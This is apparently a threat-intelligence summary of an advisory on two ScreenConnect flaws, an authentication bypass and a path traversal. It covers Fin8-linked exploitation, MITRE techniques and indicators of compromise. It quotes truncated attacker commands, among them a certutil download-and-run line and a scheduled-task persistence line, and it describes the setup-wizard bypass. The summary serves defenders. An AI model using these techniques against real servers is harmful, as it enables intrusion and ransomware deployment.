Two critical ScreenConnect vulnerabilities (CVE-2024-1709 and CVE-2024-1708) allowed authentication bypass and path traversal, enabling unauthorized access and potential RCE. The advisory details exploitation trends (web extensions deploying a webshell, certutil/PowerShell payload delivery, and Fin8-related activity) and provides IOCs, patch guidance, and defensive recommendations. #ScreenConnect #CVE-2024-1709 #CVE-2024-1708 #Fin8 #Sardonic #BYOVD
Keypoints
- ConnectWise released security patches on Feb 19, 2024 for ScreenConnect to fix CVE-2024-1709 (authentication bypass) and CVE-2024-1708 (path traversal).
- Attackers focused on the ScreenConnect server component first, using extensions to deploy webshells rather than compromising clients directly.
- Malware delivery relies on certutil and PowerShell-based download/execute chains, including a WMI/persistence approach and DLL sideloading.
- Execution Flow 1 ties activity to Fin8, including data exfiltration via Restic and attempted Rust ransomware (Qilin) deployment on victims.
- Multiple execution flows (2–8) describe various client-side techniques: DLL sideloading, WMI-based persistence, scheduled tasks, script-based downloaders, miners, and staged payloads.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The vulnerability on the ScreenConnect server allowed authentication bypass and access to setup interfaces (e.g., “append a string after /SetupWizard.aspx to gain access to the setup wizard on a previously configured system.”)
- [T1574.002] DLL Side-Loading – Attackers use extensions to deploy a webshell and load additional payloads via sideloaded DLLs
- [T1105] Ingress Tool Transfer – Extensions/downloads use certutil to fetch and run payloads from remote servers (e.g., “cmd.exe /c certutil -urlcache -f …”)
- [T1059.001] PowerShell – PowerShell-based payloads/downloads are used (e.g., “This PowerShell command uses the Invoke-WebRequest cmdlet (alias wget) to download three files from specified URLs…”)
- [T1053.005] Scheduled Task – Persistence via SCHTASKS to execute a dropped binary (e.g., “SCHTASKS /Create … /TR C:WindowsHelpHelpSentinelUI.exe …”)
- [T1047] Windows Management Instrumentation – Persistence via a WMI event subscription and a command-line consumer (e.g., “System__Cmr”)
- [T1055] Process Injection – Shellcode injected into wmiprvse.exe to run Sardonic backdoor
- [T1021] Remote Services – Abuse of ScreenConnect’s remote management features to deploy payloads to client machines
Indicators of Compromise
- [IP Address] C2 hosting and infrastructure – 185.232.92[.]32, 124.223.62[.]233, 185.232.92[.]48, 173.44.141[.]126
- [MD5] File hashes associated with payloads – f052b0a702854a601741e7034d75d883, cff3433c3eff1f20f883ef7d8c662a1a, and 2 more hashes
- [File Name] Key payloads and components – ScreenConnectUpdater.exe, rt.js, and 2 more
- [File Name] Additional artifacts – SentinelUI.exe, SentinelAgentCore.dll, and 2 more